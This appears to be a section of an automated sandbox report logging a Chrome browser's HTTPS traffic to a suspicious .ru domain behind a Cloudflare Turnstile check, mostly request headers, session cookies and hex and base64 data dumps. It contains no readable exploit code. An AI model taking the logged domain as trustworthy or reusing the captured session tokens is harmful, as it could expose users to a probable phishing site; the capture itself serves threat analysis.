                                                                                                Data Ascii: WHlXgFx+SmuKToRxcVdvi5qUb3mOmG+Sj2V7eZSXmIV5a4SfqqiAg4Cnom+IlYerc6WPmK64rJyyxpnHusm0pbbLoanC0aCioLOosLDXq7SVl6je2Z3f0aOut7bip77rrK3DrNzfw7LGsfbs5uPC9rn3ttf939PS+NcC6Ajm1MvsAw74BuP8AxMW3hUayxn15dv1EPwB8f70G/woBSX49g0l+/r4JQIPLRHoEDMjFDcc/P0TEQwNQQUAERIHBUg
                                                                                                2025-01-08 13:48:16 UTC1369INData Raw: 34 52 67 66 31 2b 49 5a 49 52 53 69 4a 70 57 61 34 78 59 56 35 79 64 6f 57 4e 77 6c 59 57 70 66 5a 6d 69 66 70 69 66 61 33 35 38 68 34 43 6c 6f 72 69 51 73 59 79 55 71 72 4b 52 6a 34 79 79 72 6e 32 79 76 35 53 51 74 71 57 58 67 34 6a 4f 75 4e 43 67 30 72 79 73 74 4d 79 6a 6f 71 44 45 78 4d 71 30 75 37 47 34 31 74 53 77 72 64 66 6b 74 4c 4b 38 35 72 7a 47 76 65 32 37 33 2b 4c 51 78 4d 33 51 30 38 66 33 39 2f 6e 4c 2f 4d 54 2b 7a 4e 6e 75 2b 64 62 4e 34 4f 50 59 35 74 6a 2b 33 67 33 5a 44 39 73 41 41 2b 37 67 37 51 66 30 35 4f 50 51 36 51 58 5a 37 4f 66 6f 44 65 41 61 41 68 7a 38 41 68 4c 64 4a 2b 66 63 4a 65 63 46 39 67 6f 43 37 77 67 4e 49 7a 41 4a 45 77 6e 32 4a 69 6b 76 43 78 67 5a 47 42 38 4e 42 43 30 41 45 54 6a 2b 42 30 67 36 44 42 63 67 49 78 78 4a
                                                                                                Data Ascii: 4Rgf1+IZIRSiJpWa4xYV5ydoWNwlYWpfZmifpifa358h4CloriQsYyUqrKRj4yyrn2yv5SQtqWXg4jOuNCg0rystMyjoqDExMq0u7G41tSwrdfktLK85rzGve273+LQxM3Q08f39/nL/MT+zNnu+dbN4OPY5tj+3g3ZD9sAA+7g7Qf05OPQ6QXZ7OfoDeAaAhz8AhLdJ+fcJecF9goC7wgNIzAJEwn2JikvCxgZGB8NBC0AETj+B0g6DBcgIxxJ


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                15192.168.2.549741188.114.96.34438072C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 13:48:16 UTC1325OUTGET /favicon.ico HTTP/1.1
                                                                                                Host: ppx.musicstrevbng.ru
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                Sec-Fetch-Site: same-origin
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: image
                                                                                                Referer: https://ppx.musicstrevbng.ru/Ax4EM/
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Cookie: XSRF-TOKEN=eyJpdiI6IitvQ3pGdFR2WVhOdGMzY0NlNE5MNUE9PSIsInZhbHVlIjoiM1d1ZHdNYmRKRjl5OTZ0RG5zNXhLZFdqTHBoTHBaK0l6MzZ5TUFMQlI3YkxtTkhGZnpoaGtBNjlSUEJRcnVFTWZrTTVYOW9qMDIvRFo0Q3VocHJnMEtXWlhJSnRjL29Mc0pTek02MHVVV0FoMmNYR011TnNFMy82NXdkZWx2bysiLCJtYWMiOiJjODczNTAzZDBiNTEwZWMxMzg5NTJhOTY2OGNhZDg2ZWVmOGFmMmY2YjY3MjM2ZmMzNDhlYThjMDVjNjAzYzY1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkIrSEdWZ1FQWmRYeHVHTjlHb0t3NEE9PSIsInZhbHVlIjoia0dWUHMyQmo3ZERQMTZVUmc4TlB4QVQ0YXVGRFZkdjlVNWZUeDZsV1RWdU1oNUk2bmwraEh5UUhsR1dKYnQ3V3JKSStXbzliWkNYZTZQUGdsWWhxZUJNWWp6QllFNkJaUjErSmYwNittcEZCdFpTcmlJcTlLZmo5YXdPSkMzaWwiLCJtYWMiOiIxNzZkNDY3NDYzMzI4YmFkMDRlODlhNWRiOGIwYjYwMWE5NmM5NmMyZjZhNjJjZjE5Yzc5MTUwOTQ3NzE1ZWExIiwidGFnIjoiIn0%3D
                                                                                                2025-01-08 13:48:16 UTC1055INHTTP/1.1 404 Not Found
                                                                                                Date: Wed, 08 Jan 2025 13:48:16 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Cache-Control: max-age=14400
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CysqjPtP%2B1eWl3zHEJhJCDoXMSsdDiPXqR273IDOLvk6SCGDoOPH9b7kCPx8M129Aa5AjRjGQK16K61rSIUxTk9exKcIZlm8U09kMhkWeLv2R9LEs6tMRMjCPFlmwQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Vary: Accept-Encoding
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=10459&min_rtt=10373&rtt_var=4063&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2241&delivery_rate=261678&cwnd=234&unsent_bytes=0&cid=cdb798fd2bc07001&ts=106&x=0"
                                                                                                CF-Cache-Status: MISS
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8feca4e9ed4441d8-EWR
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1690&min_rtt=1686&rtt_var=641&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1903&delivery_rate=1694718&cwnd=222&unsent_bytes=0&cid=c1d7a072f36c4c41&ts=447&x=0"
                                                                                                2025-01-08 13:48:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                16192.168.2.549743104.18.94.414438072C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 13:48:17 UTC811OUTGET /cdn-cgi/challenge-platform/h/g/pat/8feca4d8fcf5c334/1736344095999/71f33037ddeb4c17610da78161a65f15caeef44e2fdd5a060d33437a6ec55faf/cP1eZ3Z_qm1xGs0 HTTP/1.1
                                                                                                Host: challenges.cloudflare.com
                                                                                                Connection: keep-alive
                                                                                                Cache-Control: max-age=0
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: same-origin
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/uuwta/0x4AAAAAAA4kMM4osA_FHLjs/auto/fbE/normal/auto/
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 13:48:17 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                Date: Wed, 08 Jan 2025 13:48:17 GMT
                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                Content-Length: 1
                                                                                                Connection: close
                                                                                                2025-01-08 13:48:17 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 63 66 4d 77 4e 39 33 72 54 42 64 68 44 61 65 42 59 61 5a 66 46 63 72 75 39 45 34 76 33 56 6f 47 44 54 4e 44 65 6d 37 46 58 36 38 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gcfMwN93rTBdhDaeBYaZfFcru9E4v3VoGDTNDem7FX68AGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                2025-01-08 13:48:17 UTC1INData Raw: 4a
                                                                                                Data Ascii: J


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                17192.168.2.54974435.190.80.14438072C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 13:48:17 UTC535OUTOPTIONS /report/v4?s=CysqjPtP%2B1eWl3zHEJhJCDoXMSsdDiPXqR273IDOLvk6SCGDoOPH9b7kCPx8M129Aa5AjRjGQK16K61rSIUxTk9exKcIZlm8U09kMhkWeLv2R9LEs6tMRMjCPFlmwQ%3D%3D HTTP/1.1
                                                                                                Host: a.nel.cloudflare.com
                                                                                                Connection: keep-alive
                                                                                                Origin: https://ppx.musicstrevbng.ru
                                                                                                Access-Control-Request-Method: POST
                                                                                                Access-Control-Request-Headers: content-type
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 13:48:17 UTC336INHTTP/1.1 200 OK
                                                                                                Content-Length: 0
                                                                                                access-control-max-age: 86400
                                                                                                access-control-allow-methods: OPTIONS, POST
                                                                                                access-control-allow-origin: *
                                                                                                access-control-allow-headers: content-type, content-length
                                                                                                date: Wed, 08 Jan 2025 13:48:16 GMT
                                                                                                Via: 1.1 google
                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                Connection: close


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                18192.168.2.549745104.18.94.414438072C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 13:48:17 UTC599OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1458064514:1736343034:52qvS4QZlucpCjw1o58GpHxbb9QYG5bJ4eBnVmkvgEM/8feca4d8fcf5c334/1dU0s4F1Ep2lbLh0x7M39CDUdfPkLdJ1QAbJtTjPcOQ-1736344093-1.1.1.1-3WBI7L6bOC4JxokpayZrdTQ_s99FIE4loiGfSZZQkl4cfpT6NnlCygwihpGHh59r HTTP/1.1
                                                                                                Host: challenges.cloudflare.com
                                                                                                Connection: keep-alive
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 13:48:17 UTC379INHTTP/1.1 404 Not Found
                                                                                                Date: Wed, 08 Jan 2025 13:48:17 GMT
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 7
                                                                                                Connection: close
                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                cf-chl-out: KTqs9m6snymxTy6s3R7QAKyU/cX3YpwHLWY=$I4vyUotujMut9tqy
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8feca4f26dd0428f-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2025-01-08 13:48:17 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                Data Ascii: invalid


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                19192.168.2.549746104.18.94.414438072C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 13:48:17 UTC782OUTGET /cdn-cgi/challenge-platform/h/g/i/8feca4d8fcf5c334/1736344096000/ynYn-Mf8eQqp7b8 HTTP/1.1
                                                                                                Host: challenges.cloudflare.com
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                Sec-Fetch-Site: same-origin
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: image
                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/uuwta/0x4AAAAAAA4kMM4osA_FHLjs/auto/fbE/normal/auto/
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 13:48:17 UTC200INHTTP/1.1 200 OK
                                                                                                Date: Wed, 08 Jan 2025 13:48:17 GMT
                                                                                                Content-Type: image/png
                                                                                                Content-Length: 61
                                                                                                Connection: close
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8feca4f33c86c477-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2025-01-08 13:48:17 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 31 00 00 00 18 08 02 00 00 00 dc 5d 82 b5 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                Data Ascii: PNGIHDR1]IDAT$IENDB`


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                20192.168.2.54974735.190.80.14438072C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 13:48:17 UTC472OUTPOST /report/v4?s=CysqjPtP%2B1eWl3zHEJhJCDoXMSsdDiPXqR273IDOLvk6SCGDoOPH9b7kCPx8M129Aa5AjRjGQK16K61rSIUxTk9exKcIZlm8U09kMhkWeLv2R9LEs6tMRMjCPFlmwQ%3D%3D HTTP/1.1
                                                                                                Host: a.nel.cloudflare.com
                                                                                                Connection: keep-alive
                                                                                                Content-Length: 436
                                                                                                Content-Type: application/reports+json
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 13:48:17 UTC436OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 33 36 30 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 70 70 78 2e 6d 75 73 69 63 73 74 72 65 76 62 6e 67 2e 72 75 2f 41 78 34 45 4d 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72
                                                                                                Data Ascii: [{"age":0,"body":{"elapsed_time":1360,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://ppx.musicstrevbng.ru/Ax4EM/","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":404,"type":"http.error"},"type":"network-err
                                                                                                2025-01-08 13:48:17 UTC168INHTTP/1.1 200 OK
                                                                                                Content-Length: 0
                                                                                                date: Wed, 08 Jan 2025 13:48:17 GMT
                                                                                                Via: 1.1 google
                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                Connection: close


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                21192.168.2.549748104.18.94.414438072C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 13:48:18 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8feca4d8fcf5c334/1736344096000/ynYn-Mf8eQqp7b8 HTTP/1.1
                                                                                                Host: challenges.cloudflare.com
                                                                                                Connection: keep-alive
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 13:48:18 UTC200INHTTP/1.1 200 OK
                                                                                                Date: Wed, 08 Jan 2025 13:48:18 GMT
                                                                                                Content-Type: image/png
                                                                                                Content-Length: 61
                                                                                                Connection: close
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8feca4f7e98743bd-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2025-01-08 13:48:18 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 31 00 00 00 18 08 02 00 00 00 dc 5d 82 b5 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                Data Ascii: PNGIHDR1]IDAT$IENDB`


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                22192.168.2.549749104.18.94.414438072C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 13:48:19 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1458064514:1736343034:52qvS4QZlucpCjw1o58GpHxbb9QYG5bJ4eBnVmkvgEM/8feca4d8fcf5c334/1dU0s4F1Ep2lbLh0x7M39CDUdfPkLdJ1QAbJtTjPcOQ-1736344093-1.1.1.1-3WBI7L6bOC4JxokpayZrdTQ_s99FIE4loiGfSZZQkl4cfpT6NnlCygwihpGHh59r HTTP/1.1
                                                                                                Host: challenges.cloudflare.com
                                                                                                Connection: keep-alive
                                                                                                Content-Length: 32546
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                CF-Chl-RetryAttempt: 0
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                CF-Challenge: 1dU0s4F1Ep2lbLh0x7M39CDUdfPkLdJ1QAbJtTjPcOQ-1736344093-1.1.1.1-3WBI7L6bOC4JxokpayZrdTQ_s99FIE4loiGfSZZQkl4cfpT6NnlCygwihpGHh59r
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: */*
                                                                                                Origin: https://challenges.cloudflare.com
                                                                                                Sec-Fetch-Site: same-origin
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/uuwta/0x4AAAAAAA4kMM4osA_FHLjs/auto/fbE/normal/auto/
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 13:48:19 UTC16384OUTData Raw: 76 5f 38 66 65 63 61 34 64 38 66 63 66 35 63 33 33 34 3d 50 42 45 24 69 66 4f 59 37 66 37 47 45 47 58 4f 32 63 45 24 78 42 63 4d 66 33 4f 4a 6b 72 6a 48 72 58 45 66 75 72 32 24 74 66 45 66 31 5a 66 52 72 24 24 53 44 58 24 72 57 68 54 72 5a 24 45 42 72 4b 32 62 72 62 6f 72 4c 24 68 59 78 45 46 72 66 57 72 4e 37 49 72 58 7a 62 63 45 47 41 72 71 6a 7a 4f 55 72 2d 4d 72 73 65 68 72 47 58 72 6a 30 77 62 72 6c 24 47 30 42 58 55 25 32 62 68 78 6b 52 72 58 56 6a 31 72 6e 63 63 72 78 72 73 33 72 72 76 7a 74 72 77 72 6e 58 72 63 49 72 53 65 71 4c 24 42 50 62 66 76 6c 4c 67 65 46 33 42 6c 45 72 46 7a 71 4c 74 4e 2d 66 4c 59 74 4f 69 72 64 57 72 24 45 72 50 65 74 72 6e 41 61 47 71 59 75 57 62 4f 6e 63 71 43 58 42 33 30 4a 65 72 6a 31 4a 6d 57 41 77 68 55 52 6d 66 42
                                                                                                Data Ascii: v_8feca4d8fcf5c334=PBE$ifOY7f7GEGXO2cE$xBcMf3OJkrjHrXEfur2$tfEf1ZfRr$$SDX$rWhTrZ$EBrK2brborL$hYxEFrfWrN7IrXzbcEGArqjzOUr-MrsehrGXrj0wbrl$G0BXU%2bhxkRrXVj1rnccrxrs3rrvztrwrnXrcIrSeqL$BPbfvlLgeF3BlErFzqLtN-fLYtOirdWr$ErPetrnAaGqYuWbOncqCXB30Jerj1JmWAwhURmfB
                                                                                                2025-01-08 13:48:19 UTC16162OUTData Raw: 30 72 45 46 63 24 66 45 72 7a 72 65 24 46 59 41 51 30 45 72 45 72 4e 72 73 72 43 4d 66 37 72 6f 6f 72 45 4f 65 54 6d 72 47 74 63 4d 4f 6f 6d 6e 24 72 62 72 6c 72 58 74 47 73 6c 2b 72 4f 74 72 59 4f 34 72 6a 24 62 57 72 6b 72 72 49 66 24 4f 44 72 71 64 34 36 4f 77 72 65 72 66 59 72 74 72 71 62 66 44 50 67 72 50 79 54 72 72 72 73 35 77 63 46 62 34 72 78 42 72 6f 4f 47 72 6b 4e 30 51 6c 42 24 47 61 47 74 72 51 5a 6a 4e 69 34 49 76 33 46 57 63 72 4f 6b 77 47 2b 44 74 4f 5a 2d 63 43 66 66 4f 68 2d 56 44 54 2b 42 6d 4d 76 79 4f 31 24 57 72 74 53 54 51 72 44 79 34 24 65 4d 66 34 72 65 79 66 57 6f 31 72 62 69 74 73 6b 78 72 59 69 62 43 57 57 72 53 49 63 62 66 74 72 50 24 53 4b 49 57 72 56 24 65 6e 24 58 42 43 24 50 54 71 55 59 45 74 65 66 6f 74 72 62 79 49 2d 4f
                                                                                                Data Ascii: 0rEFc$fErzre$FYAQ0ErErNrsrCMf7roorEOeTmrGtcMOomn$rbrlrXtGsl+rOtrYO4rj$bWrkrrIf$ODrqd46OwrerfYrtrqbfDPgrPyTrrrs5wcFb4rxBroOGrkN0QlB$GaGtrQZjNi4Iv3FWcrOkwG+DtOZ-cCffOh-VDT+BmMvyO1$WrtSTQrDy4$eMf4reyfWo1rbitskxrYibCWWrSIcbftrP$SKIWrV$en$XBC$PTqUYEtefotrbyI-O
                                                                                                2025-01-08 13:48:19 UTC318INHTTP/1.1 200 OK
                                                                                                Date: Wed, 08 Jan 2025 13:48:19 GMT
                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                Content-Length: 26280
                                                                                                Connection: close
                                                                                                cf-chl-gen: wcicCVkSDKkc8mjNOXTD+rpEE2LWl3Nu+UTBy30ShC45O1LLScX2OycJzBXwpwn+/zc=$4K+4IW1/w1+7da33
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8feca4fb490ec46d-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2025-01-08 13:48:19 UTC1051INData Raw: 5a 46 64 74 57 5a 64 5a 6d 70 71 61 6d 5a 4b 6b 6d 4b 4e 79 71 4a 52 67 65 33 5a 39 72 61 56 36 67 62 47 77 73 59 79 32 69 70 4f 47 69 59 61 33 71 4c 36 6f 65 59 36 4b 6f 72 36 59 74 63 4b 51 6d 34 50 46 6c 4a 36 59 6f 73 53 65 72 4a 37 4b 71 4d 54 47 6f 4b 75 6f 31 4a 4f 74 7a 72 4c 56 72 38 47 75 33 74 44 6d 76 37 75 38 73 36 62 44 79 63 32 36 35 39 7a 79 33 63 58 46 35 4e 66 53 30 74 62 55 78 4d 37 4d 2b 4c 6e 5a 41 74 2f 64 34 4e 44 43 34 2f 62 6a 36 38 6e 6b 44 66 67 48 33 74 77 42 44 2b 6a 76 43 52 6e 6d 38 67 76 6b 37 64 63 5a 31 75 33 71 2b 68 76 36 47 51 45 6f 4b 64 38 63 35 77 48 37 36 76 67 43 43 50 77 6d 43 53 4d 4c 4c 78 63 4b 42 79 77 70 39 42 4d 35 46 51 30 58 4f 42 59 68 44 77 4d 63 46 41 49 72 4f 79 67 71 50 6b 67 74 49 6c 55 6e 4e 45 55
                                                                                                Data Ascii: ZFdtWZdZmpqamZKkmKNyqJRge3Z9raV6gbGwsYy2ipOGiYa3qL6oeY6Kor6YtcKQm4PFlJ6YosSerJ7KqMTGoKuo1JOtzrLVr8Gu3tDmv7u8s6bDyc2659zy3cXF5NfS0tbUxM7M+LnZAt/d4NDC4/bj68nkDfgH3twBD+jvCRnm8gvk7dcZ1u3q+hv6GQEoKd8c5wH76vgCCPwmCSMLLxcKBywp9BM5FQ0XOBYhDwMcFAIrOygqPkgtIlUnNEU
                                                                                                2025-01-08 13:48:19 UTC1369INData Raw: 44 65 71 4f 51 72 72 4b 6a 6c 32 6d 4c 74 35 47 47 75 61 2b 48 6b 4a 4f 4d 75 62 75 55 67 37 32 2f 6d 48 2f 42 77 35 7a 4f 78 63 65 67 69 38 6e 4c 6f 38 75 7a 70 71 2b 6f 30 64 4f 72 32 4c 76 58 33 4e 58 59 6e 73 57 6c 35 63 2f 69 79 65 6d 39 36 73 33 74 76 73 4f 70 79 76 47 77 33 62 2f 49 31 2f 4f 78 30 75 7a 7a 39 64 58 4e 39 62 7a 4e 42 63 44 62 42 51 66 56 2f 41 62 69 41 67 55 42 2f 41 59 4a 41 41 54 78 41 64 59 46 44 68 45 49 31 50 73 58 33 41 6b 54 45 75 50 65 38 68 38 6e 47 76 55 6b 39 42 37 35 47 66 67 69 2f 52 37 72 44 54 44 76 4d 6a 4d 33 39 66 73 79 44 6a 73 41 50 76 31 44 52 50 6f 30 45 44 49 33 48 51 59 43 52 67 55 49 52 30 67 4f 45 7a 41 39 50 6b 74 53 53 52 55 6b 45 68 73 56 47 46 34 64 51 69 42 57 47 31 73 69 4f 30 6f 6b 53 44 59 6a 4f 44
                                                                                                Data Ascii: DeqOQrrKjl2mLt5GGua+HkJOMubuUg72/mH/Bw5zOxcegi8nLo8uzpq+o0dOr2LvX3NXYnsWl5c/iyem96s3tvsOpyvGw3b/I1/Ox0uzz9dXN9bzNBcDbBQfV/AbiAgUB/AYJAATxAdYFDhEI1PsX3AkTEuPe8h8nGvUk9B75Gfgi/R7rDTDvMjM39fsyDjsAPv1DRPo0EDI3HQYCRgUIR0gOEzA9PktSSRUkEhsVGF4dQiBWG1siO0okSDYjOD
